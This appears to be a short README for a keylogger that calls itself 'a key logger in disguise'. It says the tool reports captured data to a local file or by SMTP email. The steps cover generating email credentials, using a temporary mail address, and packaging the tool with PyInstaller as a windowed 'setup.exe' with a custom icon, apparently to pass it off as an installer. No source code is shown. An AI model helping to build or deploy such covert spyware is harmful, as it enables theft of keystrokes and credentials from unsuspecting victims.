A Key logger in disguise. This app can report data via [local file, smtp/email]
- uncomment the lines of code in
create_credentials.py
and generate your (credentials.ini) - checkout https://temp-mail.org/en for a mock email address (handy for dev purposes)
- create executable
pyinstaller --onefile --windowed --icon=".\resources\kl.ico" setup.py
- run the
setup.exe